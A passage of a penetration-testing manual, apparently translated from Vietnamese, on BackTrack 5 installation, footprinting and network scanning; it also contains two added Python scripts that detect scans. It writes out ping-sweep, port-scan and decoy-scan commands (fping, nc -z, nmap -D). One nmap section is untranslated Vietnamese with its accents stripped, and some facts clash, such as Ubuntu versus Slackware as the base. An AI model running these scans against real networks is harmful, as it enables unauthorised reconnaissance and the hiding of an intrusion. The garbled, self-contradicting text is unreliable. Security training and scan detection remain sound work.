GUIDE TO USING BACKTRACK 5 TO EXPLOIT NETWORK VULNERABILITIES
AT THE ATHENA CENTER


FOREWORD
First, we would like to sincerely thank Mr. Võ Đỗ Thắng, Director of the Athena Network Administration and Network Security Training Center, and Mr. Lê Đình Nhân for their enthusiastic help in completing this document.
We also thank the consulting and technical support staff at the Athena Network Administration Training Center for supporting us and making it possible to complete this network security project on the assigned schedule.
Respectfully,
The project team:
Nguyn Sn Kh
Tn Pht
Nguyn Cao Thng


TABLE OF CONTENTS

Introductory chapter: INTRODUCTION TO BACKTRACK 5 ... 6
I. Introduction ... 6
II. Purpose ... 6
III. Where to download Backtrack ... 7
IV. Installation ... 8
1. Live DVD ... 8
2. Install ... 8
Chapter 1: UNDERSTANDING LAN SECURITY ISSUES ... 16
I. Introduction ... 16
II. System and network security issues ... 16
1. General issues of system and network security ... 16
2. Some concepts and the history of system security ... 16
3. Types of security vulnerabilities and the main network attack methods ... 17
Chapter 2: FOOTPRINTING ... 21
I. Introduction to Footprinting ... 21
II. Steps of Footprinting ... 21
1. Determining our scope ... 21
2. Publicly available information ... 21
3. Whois and DNS Enumeration ... 21
4. DNS probing ... 22
5. Network probing ... 22
III. Footprinting methods ... 22
IV. Footprinting tools ... 25
1. Sam Spade ... 25
2. Super Email Spider ... 26
3. VisualRoute Trace ... 27
4. Maltego ... 27
Chapter 3: SCANNING ... 28
I. Introduction ... 28
II. Functions ... 28
1. Determining whether a system is up ... 28
2. Determining which services are running or listening ... 31
3. Identifying the operating system ... 37
Chapter 4: ENUMERATION ... 39
I. What is Enumeration? ... 39
II. Banner Grabbing ... 39
III. Enumerating network services ... 39
1. HTTP fingerprinting ... 39
2. DNS Enumeration ... 42
3. NetBIOS name ... 44
Chapter 5: PASSWORD CRACKING ... 45
I. Introduction ... 45
II. Password Cracking Techniques ... 45
1. Dictionary Attacks/Hybrid Attacks ... 45
2. Brute Forcing Attacks ... 45
3. Syllable Attacks/Pre-Computed Hashes ... 45
III. Common Attack Types ... 45
1. Active Password Cracking ... 45
2. Passive Password Cracking ... 46
3. Offline Password Cracking ... 46
IV. Password Cracking Tools ... 46
1. Hydra ... 46
2. Medusa ... 48
V. Password Cracking Over Protocols ... 51
1. HTTP (HyperText Transfer Protocol) ... 51
2. SSH (Secure Shell) ... 58
3. SMB (Server Message Block) ... 61
4. RDP (Remote Desktop Protocol) ... 64
Chapter 6: SYSTEM HACKING ... 67
I. INTRODUCTION TO METASPLOIT ... 67
1. Introduction ... 67
2. Components of Metasploit ... 67
3. Using the Metasploit Framework ... 67
4. Introduction to the Meterpreter payload ... 68
5. Countermeasures ... 70
II. The MS10-046 (2286198) vulnerability ... 70
1. Introduction ... 70
2. Attack steps ... 71
3. Countermeasures ... 79
III. The BYPASSUAC vulnerability ... 80
1. Introduction ... 80
2. Attack steps ... 80
3. Countermeasures ... 85
Chapter 7: WEB HACKING WITH DVWA ... 86
I. Introduction ... 86
II. Installing DVWA on Backtrack ... 86
1. Downloading and installing XAMPP ... 86
2. Downloading and installing DVWA ... 88
III. Attack techniques on DVWA ... 92
1. XSS (Cross-Site Scripting) ... 92
2. SQL Injection ... 100
REFERENCES ... 106


Introductory chapter: INTRODUCTION TO BACKTRACK 5
I. Introduction

Backtrack is a Live DVD Linux distribution developed for penetration testing. In Live DVD form we can use Backtrack directly from the DVD without installing it on our machine. Backtrack can also be installed to the hard disk and used as an operating system. Backtrack is the merger of three different penetration-testing Linux distributions: IWHAX, WHOPPIX and Auditor. In its current version (5), Backtrack is based on the Ubuntu 11.10 Linux distribution. As of 19 July 2010, Backtrack 5 had been downloaded by more than 1.5 million users. The latest release is Backtrack 5 R2.
II. Purpose
The Backtrack toolkit has a fairly long development history across several Linux distributions. The current version uses the Slackware Linux distribution (Tomas M., www.slax.org). Backtrack continuously updates its tools, drivers and so on; at present it contains over 300 tools for security research. Backtrack is the combination of two very well-known security testing toolkits, Whax and Auditor.
Backtrack 5 contains a number of tools that can be used during our penetration tests. The penetration-testing tools in Backtrack 5.0 can be categorised as follows:
Information gathering: this category contains tools that can be used to obtain information about a target's DNS, routing, e-mail addresses, websites, mail servers and so on. This information is collected from sources available on the Internet, without touching the target environment.
Network mapping: this category contains tools that can be used to check which hosts exist, obtain OS information and the applications used by the target, and also perform port scanning.
Vulnerability identification: in this category we find tools for scanning vulnerabilities in general and in Cisco devices in particular. It also contains tools for performing and analysing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
Web application analysis: this category contains tools that can be used to monitor and test web applications.
Radio network analysis: to test wireless networks, Bluetooth and radio-frequency identification (RFID), we can use the tools in this category.
Penetration: this category contains tools that can be used to exploit the vulnerabilities found on target computers.
Privilege escalation: after exploiting vulnerabilities and gaining access to the target computers, we can use the tools in this category to raise our privileges to the highest level.
Maintaining access: tools in this category help us maintain access to the target computers. We may need the highest privileges before we can install tools to maintain access.
Voice Over IP (VOIP): to analyse VOIP we can use the tools in this category.
Digital forensics: in this category we find tools that can be used for forensic analysis, such as acquiring hard-disk images, examining file structures and analysing disk images. To use the tools provided in this category, we can choose Start Backtrack Forensics in the boot menu. This sometimes requires us to mount the internal hard disk and swap files read-only so that their integrity is preserved.
Reverse engineering: this category contains tools that can be used to debug a program or disassemble an executable file.
III. Where to download Backtrack

We can download Backtrack 5 at: www.backtrack-linux.org/downloads/
Both a VMware image and an ISO file are available.

IV. Installation
1. Live DVD
If we want to use Backtrack without installing it to the hard disk, we can burn the ISO image file to a DVD and boot our computer from that DVD. Backtrack will then run from the DVD. The advantage of using Backtrack as a Live DVD is that it is very easy to do and we do not have to disturb the current configuration of our machine.
However, this method also has some disadvantages. Backtrack may not work with all hardware, and any configuration changes made to get the hardware working are not saved on the Live DVD. It is also slow, because the computer has to load programs from the DVD.
2. Install
a) Installing on a physical machine:
We need to prepare a partition on which to install Backtrack. Then we boot the Backtrack Live DVD. At the login screen we use the username root and the password toor. Then, to enter graphical mode, we type startx and we are in the graphical desktop of Backtrack 5.
To install Backtrack 5 to the hard disk we choose the file named install.sh on the desktop and proceed with the installation. If that file cannot be found, we can use ubiquity to install instead: open a Terminal and type ubiquity.
The installer window then appears. We answer a few questions such as the city we live in, the keyboard layout and the disk partition to install to, and then proceed with the installation.
b) Installing in a virtual machine:
The advantage is that we do not need to prepare a partition for Backtrack, and we can use another OS at the same time. The disadvantages are slower speed and no wireless support except for USB wireless adapters.
We can use the VMware image provided by BackTrack, which gives us BackTrack in a virtual machine quickly and easily. The configuration in the VMware image is: memory 768MB, hard disk 30GB, network NAT. To use the physical network card, we must set the network type to Bridged.
Below are some screenshots of installing BackTrack in a VMware virtual machine.

[Screenshot] Create a new virtual machine and insert the BackTrack disc.

[Screenshot] The BackTrack boot screen.

[Screenshot] Type startx to enter graphical mode in BackTrack.

[Screenshot] To install, click the Install BackTrack file on the Desktop.

[Screenshot] Choose the language, then click Forward to continue.

[Screenshot] Choose our location, then click Forward to continue.

[Screenshot] Choose the keyboard layout, then click Forward to continue.

[Screenshot] Choose the partition to install to.

[Screenshot] Press Install to begin the installation.

[Screenshot] The installation process begins.

[Screenshot] When it finishes, simply reboot and the installation is complete.

Chapter 1: UNDERSTANDING LAN SECURITY ISSUES
I. Introduction
Computer network security is ultimately a human problem, so establishing a legal framework and concrete working rules is necessary. Here the legal framework may include the provisions of state law and sub-statutory documents, while concrete regulations are set by each organisation to suit its own characteristics: rules on personnel, on the use of machines, on the use of software, and so on. Security for a computer network system is therefore most effective when we thoroughly implement the policy and human-factor measures. In short, computer network security is a large problem that calls for a comprehensive solution, not only software and hardware but also policy and people. It must be pursued continuously and is never fully solved, because new issues keep arising over time. Nevertheless, with sound comprehensive measures, and especially by handling the policy and human side well, we can make ourselves considerably safer.
II. System and network security issues
1. General issues of system and network security
The common characteristic of a network system is that it is shared by many users and geographically distributed, so protecting resources (against loss or improper use) is much more complex than in the environment of a single computer or a single user. The network administrator must ensure that information on the network is reliable and used for the right purpose and by the right people, while keeping the network running stably and protected from attackers. In practice, however, no network is absolutely secure: however well a system is protected, at some point it may be defeated by people with bad intentions.
2. Some concepts and the history of system security
a) Network attackers (intruders)
Attackers are individuals or organisations who use networking knowledge and attack tools (hardware or software) to search for weaknesses and security holes in a system, break in and seize resources illegally. Some kinds of network attacker are:
Hacker: someone who breaks into a network illegally by using password-cracking tools or exploiting weaknesses in the system's access components.
Masquerader: someone who forges information on the network, such as spoofing IP addresses, domain names or user identities.
Eavesdropper: someone who listens in on network traffic using sniffer tools, then uses analysis and debugging tools to extract valuable information.
Network attackers may have many different aims, such as stealing economically valuable information, deliberately sabotaging the network system, or simply acting carelessly.
b) Security vulnerabilities
Security vulnerabilities are weaknesses in a system, or hidden in a service, that allow an attacker to enter the system illegally and carry out destructive actions or seize resources unlawfully. There are many causes of vulnerabilities: faults in the system itself or in the supplied software, or a weak administrator who does not understand the services provided in depth. Vulnerabilities differ in their impact: some only affect the quality of the service provided, while others affect the whole system or destroy it.
c) Security policy
A security policy is the set of rules that apply to everyone who takes part in administering the network or uses its resources and services. Each situation needs its own security policy. A security policy helps users know their responsibility for protecting resources on the network, and helps the network administrator establish effective safeguards when equipping, configuring and monitoring the operation of the system and the network.
3. Types of security vulnerabilities and the main network attack methods
a) Types of vulnerabilities
Many organisations have classified vulnerabilities in their own particular ways. According to the U.S. Department of Defense, vulnerabilities fall into three classes:
Class C vulnerabilities
These allow Denial of Service (DoS) attacks. Their danger level is low: they only affect the quality of service, causing the system to stall or be interrupted, without destroying data or granting unauthorised access. DoS is a form of attack that uses the Internet-layer protocols of the TCP/IP suite to stall a system so that legitimate users are denied access to, or use of, the system. Services with vulnerabilities that allow DoS attacks can be upgraded or patched with newer versions from the vendors. At present there is no fully effective measure against this kind of attack, because the design of the Internet layer (IP) in particular, and the TCP/IP suite in general, already carries the latent risk of this class of vulnerability.
Class B vulnerabilities
These allow a user to gain additional rights on the system without a validity check, leading to loss of information that should be kept confidential. This class of vulnerability usually exists in applications on the system and has a medium danger level, higher than class C. It allows an internal user to obtain higher privileges or illegitimate access.
Vulnerabilities of this class usually appear in services on the system. A local user is understood to be someone who already has access to the system with certain limited rights. Another form of class B vulnerability occurs in programs written in C. C programs commonly use a buffer, a region of memory used to store data before it is processed. Programmers use a buffer in memory before assigning a memory area to each block of data. For example, a program that reads a user's name field may restrict that field to 20 characters with the declaration char first_name[20]; this declaration allows the user to enter at most 20 characters. When data is entered it is first stored in the buffer. If the user enters more than 20 characters, the buffer overflows: the extra characters land outside the buffer, where we can no longer control them. Attackers can exploit such holes by entering specially crafted characters to execute commands on the system. These holes are usually exploited by existing users of the system to obtain root rights illegitimately. To limit class B vulnerabilities, the system configuration and its programs must be strictly controlled.
Class A vulnerabilities
These allow outsiders to gain illegitimate access to the system and can destroy the entire system. This class is extremely dangerous, threatening the integrity and confidentiality of the system. These vulnerabilities usually appear on systems that are poorly administered or whose network configuration is not under control. They are especially dangerous because they exist ready-made in the software in use, and an administrator who does not deeply understand the services and software may overlook the weakness. The security announcements of the newsgroups on the network must therefore be checked regularly to detect vulnerabilities of this class. A series of programs whose old versions are commonly used have class A vulnerabilities, such as FTP, Gopher, Telnet, Sendmail, ARP and finger.

b) Common forms of network attack
Scanner
A scanner is a program that automatically probes for and detects security weaknesses on a local workstation or a remote one. An attacker using a scanner can discover security holes on a server even from afar. It works by probing for the TCP/UDP ports in use on the system under attack and the services running on that system. The scanner records the remote system's responses for each service it discovers and from these can find weaknesses in the system. For a scanner to operate, the device and system requirements are an environment that supports TCP/IP and a system connected to the Internet. Scanner programs play an important role in a security system, because they are able to detect weak points in a network system.
Password Cracker
A password cracker is a program able to recover an encrypted password, or to disable a system's password protection. Different cracking programs work on different principles. Some generate a limited word list, apply an encryption algorithm to it, compare the result with the encrypted password to be cracked, and generate a further list according to the program's logic. When a match with the encrypted password is found, the attacker has the password in plain text. The plain-text password is usually written to a file. The remedy for this form of attack is to build a proper password protection policy.
Sniffer
Sniffers are tools (hardware or software) that capture the information flowing through a network and extract the valuable information exchanged on it. A sniffer can capture the information exchanged between many workstations. It captures packets from the IP layer downwards. The IP-layer protocol is publicly defined and its header fields are clearly structured, so decoding these packets is not difficult.
The purpose of a sniffer program is to put the Ethernet network card, where the packets exchanged on the network pass through, into promiscuous mode and thereby "catch" the information. Sniffer devices can capture all the information exchanged on the network because Ethernet packets are broadcast. However, setting up a sniffer system is not simple, because the attacker must first get into the network system and install the sniffer software, and sniffer programs also require their user to understand network architecture and protocols in depth. Detecting that a system is being sniffed is not simple either, because a sniffer works at a very low layer and does not affect the applications or services the system provides. Nevertheless, building measures to limit sniffing is not too hard if we follow security principles such as:
- Do not let strangers access the devices on the system.
- Manage the system configuration strictly.
- Establish highly secure connections through encryption mechanisms.
Trojans
A Trojan is a program that runs illegitimately on a system while posing as a legitimate program. A Trojan is able to run because the code of a legitimate program has been altered into illegitimate code. Viruses, for example, are a typical kind of Trojan: virus programs hide their code inside legitimately used programs, and when those programs are activated the hidden code executes and performs functions the user does not know about, such as stealing passwords or copying files without the user being aware. A Trojan program performs one of the following tasks:
Performs some function, or helps its programmer discover important or personal information on a system or on only some components of that system.
Hides some function, or helps its programmer discover important or personal information on a system or on only some components of it.
There are also Trojan programs that perform both of these functions. Some Trojans can even destroy the system by destroying the information on the hard disk, but today Trojans of this kind are easily detected and rarely effective. More serious cases occur when attackers create security holes through Trojans, obtain root rights on the system and abuse them to destroy part or all of the system, or use root rights to alter log files and install further Trojans that the administrator cannot detect. The impact is then very serious and the administrator has no option but to reinstall the whole system.

Chapter 2: FOOTPRINTING

I. Introduction to Footprinting
Footprinting is a technique for gathering information about a business, individual or organisation.
It is one of the three phases that must be carried out to perform an attack.
An attacker spends 90% of the effort collecting and searching for information and 10% carrying out the attack.
The result of footprinting is the target's basic information: name, company address, website, company members, network diagram, and so on.
Information to look for:
- Internet: domain, network blocks, IP, TCP or UDP, system enumeration, ACLs, IDSes, ...
- Intranet
- Remote access: remote system type, ...
- Extranet: connection origination and destination, ...
II. Steps of Footprinting
Footprinting consists of the following steps:
1. Determining our scope
The first order of business is to determine the scope of our footprinting activities. Identifying all the entities in an organisation can be a daunting task. Hackers, however, have no sympathy for our struggle: they exploit weaknesses in whatever form they take. We do not want hackers to learn much about the state of our security.
2. Publicly available information
The amount of information readily available about us, our organisation and anything else we can think of is nothing short of amazing.
This information may include: the company website; related organisations; physical location; detailed employee information; current events; security and privacy policies.
3. Whois and DNS Enumeration
Look up detailed information about IP addresses, name servers and DNS servers.

4. DNS probing
After identifying all the related domains, we begin querying DNS. DNS is a distributed database used to map IP addresses to hostnames. If DNS is not configured securely, there is a good chance of obtaining information leaked from the organisation.
5. Network probing
Now that we have identified the potential networks, we can determine the network topology and the possible access paths into the network.

III. Footprinting methods
There are two ways to perform footprinting:
- Active footprinting: contact the target directly to learn the required information.
- Passive footprinting: search through press articles, websites, the target's competitors, and so on.
Websites: www.google.com, http://whois.domaintools.com, www.whois.net, www.tenmien.vn, www.archive.org, ...

[Screenshot] Whois: athena.com.vn

[Screenshot] Tenmien.vn

[Screenshot] Archive: http://www.microsoft.com

IV. Footprinting tools
Sam Spade, Super Email Spider, VisualRoute Trace, Google Earth, Whois, Site Digger, Maltego, ...
1. Sam Spade
Lets the user perform actions such as Ping, Nslookup, Whois, Traceroute, ...

2. Super Email Spider
Searches for the e-mail addresses of an organisation using search engines: Google, Lycos, iWon, Excite, Hotbot, MSN, AOL, ...

3. VisualRoute Trace
Displays the connection paths, the addresses and the regions the connection passes through.

4. Maltego
A tool for discovering links between people, agencies, organisations, websites, domains, network ranges, IP addresses, ...


Chapter 3: SCANNING
I. Introduction
If footprinting is about locating where the information sources are, scanning is about finding all the doors that lead into those sources. During footprinting we obtained a list of IP network ranges and IP addresses through various techniques, including whois and ARIN queries. Those techniques give the security administrator, and the hacker, a great deal of valuable information about the target network: IP ranges, DNS servers and mail servers. In this chapter we determine which systems are listening on the network, and what can be picked up, using a range of tools and techniques such as ping sweeps and port scans. We can also manually bypass firewalls to scan systems that appear to be blocked by filtering rules.
II. Functions
1. Determining whether a system is up
One of the basic steps in mapping a network is a ping sweep over a range of network and IP addresses to determine whether devices or systems are active. Ping is typically used to send ICMP ECHO packets to the target system, hoping to receive an ICMP ECHO REPLY that shows the system is up. Ping is acceptable for determining the number of live systems in small and medium networks (a class C network has 254 addresses, a class B 65534), but it can take hours or days to complete for a class A network with 16277214 addresses.
a) Network Ping Sweeps
Network pinging is the act of sending various kinds of network traffic to the target and analysing the result. Pinging uses ICMP (Internet Control Message Protocol); it can also use TCP or UDP to find live hosts.
To perform an ICMP ping sweep we can use fping, nmap and similar tools:
fping -a -g 192.168.10.1 192.168.10.10
-a: show hosts that are alive
-g: address range, given as 192.168.10.0/24 or as a start and end address as above

nmap -sP -PE 192.168.10.0/24
-sP: ping scan
-PE: ICMP echo ping

Countermeasure: we can use pingd to handle all ICMP ECHO and ICMP ECHO REPLY traffic at host level. This is achieved by removing ICMP ECHO processing support from the system kernel. Essentially it provides a system-level access control mechanism.
b) ICMP query
Ping sweeps (ICMP ECHO packets) are only the tip of the iceberg when it comes to the ICMP information that can be learned about a system. Many kinds of valuable information can be gathered simply by sending ICMP packets. We can ask a device for its network mask with an Address Mask Request. The network mask is important because with it we can determine all the target's addresses, its default gateway and its broadcast address. Knowing the default gateway, we can attack the router; the same goes for the broadcast address. Not all routers, however, support the Timestamp and Netmask requests.
Countermeasure: block the ICMP types that leak information at the border router (the router facing the ISP). To keep exposure to a minimum, we should use access lists (ACLs):
access-list 101 deny icmp any any 13   (timestamp request)
access-list 101 deny icmp any any 17   (address mask request)

2. Determining which services are running or listening
a) Port Scanning
Port scanning is the process of sending packets to TCP and UDP ports on the target system to determine which services are running or in the listening state. Identifying listening ports is essential for identifying running services. In addition, we can determine the type and version of the operating system and the applications in use.
b) Types of Scan
Before performing port scanning, we should review the available scanning methods:
TCP Connect scan: connects to the target port and completes the full three-way handshake (SYN, SYN/ACK, ACK). However, it is easily detected by the target system. It uses the system's connect() call rather than raw packets and is typically used by unprivileged Unix users, who cannot perform a SYN scan.
TCP SYN scan: does not open a full connection, but only sends a SYN packet (the first step of the three-way handshake) to the target. If a SYN/ACK comes back, we know the port is listening; if an RST/ACK comes back, the port is not listening. This technique is harder to detect than a TCP connect scan because it leaves no connection record on the target. One drawback is that it can create a denial-of-service condition if too many half-open connections are created, so the technique is safe only as long as not too many such connections are made.
TCP ACK scan: used to map out firewall rule sets. It can help determine whether the firewall is a simple packet filter that permits connections or an advanced filter. However, it cannot tell which ports are open or closed.
TCP Window scan: the same as the ACK scan, except that it can distinguish open ports from closed ones.
UDP scan: sends a UDP packet to the target port. If the target replies with an ICMP port unreachable message, the port is closed; if no such message is received, the port is open. However, UDP scanning is very slow when we try to scan a device protected by a strict packet-filtering policy.
TCP FIN, XMAS and NULL scans: these specialise in slipping past firewalls to discover the systems behind them. However, they depend heavily on how the target system handles the probes, and some systems (typically Windows) show no reaction at all.
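Each scan type above leaves a distinctive pattern on the wire, and that pattern is what a defender's detection logic keys on: an ICMP echo sweep touches many hosts, a SYN scan sends bare SYNs to many ports and never completes the handshake, a connect() scan does complete it, and NULL/FIN/XMAS probes use flag combinations no normal client sends. The following Python script is an added example, not part of the original document or of any tool it describes. It reads constructed packet-summary records (the record format, the thresholds and the sample addresses are assumptions made for this example) and labels each source address with the probe pattern it matches, covering both the ping sweep of section 1 and the TCP scan types listed here.

```python
"""Classify probe patterns in a packet-summary log, as seen from the defender's side."""
from collections import defaultdict

# Constructed sample records (not captured traffic), one per client->server packet:
# "<src> > <dst> <proto> dport=<port> flags=<flags>"
# TCP flags use tcpdump letters (S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST);
# "-" means no flag set (a NULL probe). ICMP records carry the ICMP type in flags.
SAMPLE_LOG = (
    # ICMP echo to six consecutive hosts: a ping sweep
    [f"192.168.10.50 > 192.168.10.{i} icmp dport=0 flags=echo" for i in range(1, 7)]
    # SYN to 12 ports, never followed by an ACK: half-open (SYN) scan
    + [f"10.0.0.9 > 192.168.10.102 tcp dport={p} flags=S" for p in range(20, 32)]
    # SYN then ACK to the same 12 ports: full connect() scan
    + [f"10.0.0.7 > 192.168.10.102 tcp dport={p} flags={f}"
       for p in range(20, 32) for f in ("S", "A")]
    # NULL and XMAS probes
    + ["10.0.0.8 > 192.168.10.102 tcp dport=22 flags=-",
       "10.0.0.8 > 192.168.10.102 tcp dport=80 flags=FPU"]
    # an ordinary client completing one handshake to port 80
    + ["192.168.10.20 > 192.168.10.102 tcp dport=80 flags=S",
       "192.168.10.20 > 192.168.10.102 tcp dport=80 flags=A"]
)

ODD_FLAG_COMBOS = {"-", "F", "FPU"}   # NULL, FIN and XMAS probes respectively


def parse_line(line):
    """Split one summary record into its fields."""
    src, _, dst, proto, dport, flags = line.split()
    return {
        "src": src,
        "dst": dst,
        "proto": proto,
        "dport": int(dport.split("=", 1)[1]),
        "flags": flags.split("=", 1)[1],
    }


def classify(lines, host_threshold=5, port_threshold=10):
    """Return {source: sorted labels} for sources whose traffic matches a probe pattern.

    host_threshold: distinct hosts pinged before we call it a sweep.
    port_threshold: distinct (host, port) SYN targets before we call it a port scan.
    """
    echo_targets = defaultdict(set)   # src -> hosts sent an ICMP echo request
    syn_targets = defaultdict(set)    # src -> (dst, port) sent a bare SYN
    ack_targets = defaultdict(set)    # src -> (dst, port) sent a bare ACK (handshake done)
    odd_flags = defaultdict(set)      # src -> flag combinations no normal client sends

    for rec in map(parse_line, lines):
        src = rec["src"]
        if rec["proto"] == "icmp" and rec["flags"] == "echo":
            echo_targets[src].add(rec["dst"])
        elif rec["proto"] == "tcp":
            key = (rec["dst"], rec["dport"])
            if rec["flags"] == "S":
                syn_targets[src].add(key)
            elif rec["flags"] == "A":
                ack_targets[src].add(key)
            elif rec["flags"] in ODD_FLAG_COMBOS:
                odd_flags[src].add(rec["flags"])

    findings = defaultdict(list)
    for src, hosts in echo_targets.items():
        if len(hosts) >= host_threshold:
            findings[src].append("icmp ping sweep")
    for src, targets in syn_targets.items():
        if len(targets) >= port_threshold:
            # A SYN scan never completes the handshake; a connect() scan does.
            completed = len(targets & ack_targets[src])
            kind = "tcp connect scan" if completed * 2 >= len(targets) else "tcp syn scan"
            findings[src].append(kind)
    for src, combos in odd_flags.items():
        findings[src].append("null/fin/xmas probe (" + ",".join(sorted(combos)) + ")")
    return {src: sorted(labels) for src, labels in findings.items()}


if __name__ == "__main__":
    for src, labels in sorted(classify(SAMPLE_LOG).items()):
        print(f"{src:15} {'; '.join(labels)}")
```

The SYN-versus-connect distinction rests on whether the source ever sends the third-handshake ACK to the ports it probed, which is exactly why the text calls the SYN scan harder to detect from connection logs alone. The thresholds are deliberately low for the sample and would be tuned to the network's normal traffic before use.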
c) Determining the running TCP and UDP services
Strobe: highly reliable, but it only supports TCP, not UDP.

Netcat is a simple Unix networking utility that reads and writes data across network connections using TCP/IP. It is designed as a reliable "back-end" tool that can be used directly or driven easily by other programs and scripts, and it is also a feature-rich network debugging and exploration tool.
nc -v -z -w2 192.168.10.102 1-4000
-v: verbose output on screen
-z: zero-I/O mode, sends no data and only emits a connection attempt per port
-w2: wait at most 2 seconds per connection
192.168.10.102: the host
1-4000: the port range to scan

Nmap (Network Mapper) is a free open-source utility for network discovery and security auditing. Many network and system administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating systems (and OS versions) they run, what type of packet filters or firewalls are in use, and dozens of other characteristics. It is designed to scan large networks rapidly, but works fine against single hosts. Nmap runs on all major operating systems, and official binary packages are available for Linux, Windows and Mac OS X.
The simplest usage, with no parameters: nmap 192.168.10.0/24

The process runs as follows:
a. Chuyn <target> t hostname thnh Ipv4 s dng DNS. Nu l mt a
ch IP th khng cn chuyn.
b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v
mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay
khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s
dung Ping NULL(-PN) b qua bc ny.
c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b
qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin.
d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti
nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect
scan s c thay th khi ngi dng Unix khng phi root thiu quyn
cn thit gi cc gi tin th.

e. In kt qua ln mn hnh
Qut host ang up: nmap sP PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo

Depending on the complexity of the target network and its hosts, the scan can be detected easily. Nmap provides the ability to spoof the source address with the -D (decoy) option. It was created to flood the target site with spoofed information. The basic idea behind this option is to run fake scans at the same time as the real scan. The target system responds to the spoofed addresses as well as to our real port scan. Most importantly, the decoy addresses must be alive; otherwise the SYN scan can lead to a denial-of-service condition.
nmap -sS -PE 192.168.10.0/24 -D 10.10.10.1
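As an added defensive counterpart to the nmap scans above (example code, not part of the original manual), the following Python script runs simple detection logic over constructed firewall log lines: it flags any source that touches many distinct ports on one host, and then groups flagged sources whose probes are identical second by second, which is the footprint a -D decoy scan leaves because the decoys send the same probes as the real scanner. The log format and all addresses are assumptions.

```python
import re
from collections import defaultdict

# Constructed firewall log lines (assumed format: "<date> <time> SRC=<ip> DST=<ip> DPT=<port>").
# 192.168.10.50 probes six ports of 192.168.10.102; 10.10.10.1 sends the identical probes at the
# same seconds, as a decoy address given with -D would; 192.168.10.7 is an ordinary client.
SAMPLE_LOG = """\
2012-05-10 10:00:00 SRC=192.168.10.50 DST=192.168.10.102 DPT=21
2012-05-10 10:00:00 SRC=10.10.10.1 DST=192.168.10.102 DPT=21
2012-05-10 10:00:00 SRC=192.168.10.50 DST=192.168.10.102 DPT=22
2012-05-10 10:00:00 SRC=10.10.10.1 DST=192.168.10.102 DPT=22
2012-05-10 10:00:01 SRC=192.168.10.50 DST=192.168.10.102 DPT=23
2012-05-10 10:00:01 SRC=10.10.10.1 DST=192.168.10.102 DPT=23
2012-05-10 10:00:01 SRC=192.168.10.50 DST=192.168.10.102 DPT=25
2012-05-10 10:00:01 SRC=10.10.10.1 DST=192.168.10.102 DPT=25
2012-05-10 10:00:02 SRC=192.168.10.50 DST=192.168.10.102 DPT=80
2012-05-10 10:00:02 SRC=10.10.10.1 DST=192.168.10.102 DPT=80
2012-05-10 10:00:02 SRC=192.168.10.50 DST=192.168.10.102 DPT=443
2012-05-10 10:00:02 SRC=10.10.10.1 DST=192.168.10.102 DPT=443
2012-05-10 10:05:00 SRC=192.168.10.7 DST=192.168.10.102 DPT=80
2012-05-10 10:05:01 SRC=192.168.10.7 DST=192.168.10.102 DPT=443
"""

LINE_RE = re.compile(r"^(\S+ \S+) SRC=(\S+) DST=(\S+) DPT=(\d+)$")


def parse(log):
    """Return a list of (timestamp, src, dst, port) tuples; unrelated lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return events


def port_scanners(events, min_ports=5):
    """Map each source touching at least min_ports distinct ports on one destination to that port set."""
    ports = defaultdict(set)
    for _, src, dst, port in events:
        ports[(src, dst)].add(port)
    return {src: p for (src, dst), p in ports.items() if len(p) >= min_ports}


def decoy_groups(events, scanners):
    """Group flagged sources whose probe sets (second, destination, port) are identical.

    A scan run with -D makes every decoy send the same probes as the real scanner at the same
    moment, so the log shows several sources with exactly the same probe set. One of them is
    the real scanner; an ordinary single-host scan never produces such twins."""
    signature = defaultdict(set)
    for ts, src, dst, port in events:
        if src in scanners:
            signature[src].add((ts, dst, port))
    twins = defaultdict(list)
    for src, sig in signature.items():
        twins[frozenset(sig)].append(src)
    return sorted(sorted(group) for group in twins.values() if len(group) > 1)


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    found = port_scanners(ev)
    print("scanning sources:", sorted(found))
    print("decoy groups (the real scanner is one of these):", decoy_groups(ev, found))
```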

d) Countermeasures:
Disable all unnecessary services. On Unix, we can do this by reviewing the unnecessary services in /etc/inetd.conf and disabling their startup scripts. On Windows it is hard to disable unnecessary services because of the way Windows works: TCP ports 139 and 445 provide many of the functions Windows needs to operate.
3. Operating System Identification
Many powerful tools and port-scanning techniques are available for finding open ports on the target system. Looking back, our first objective in port scanning was to identify the TCP and UDP ports on the target. With that information we can ask which listening ports carry which weaknesses. But we need more information about the target, namely its operating system.
a) Active OS Detection
The more detailed the information about the operating system, the more useful it is for vulnerability analysis. We can use banner grabbing, which pulls information from services such as FTP, telnet, SMTP and HTTP. This is the simplest way to detect the operating system and the version it runs. The more accurate technique is stack fingerprinting. It is a very powerful technique that lets us identify the target operating system with high confidence. Stack fingerprinting requires at least one listening port on the target. Nmap can still guess when no port is open.


Active OS detection sends packets to the target to determine the distinctive details of its network stack, which lets us guess the operating system. Because it has to send such packets, it is easily detected, so this is not the approach a hacker would use in an attack.
Nmap with -O identifies the operating system.

b) Passive OS Detection
Uses passive stack fingerprinting. It is similar in concept to active stack fingerprinting. Instead of sending packets to the target, which is easy to detect, the attacker silently monitors network traffic to determine the operating system in use. So by monitoring the traffic between different systems we can identify the operating system. This technique depends on a central position in the network and on a port that allows packet capture.



Chapter 4: ENUMERATION
I. What is Enumeration?
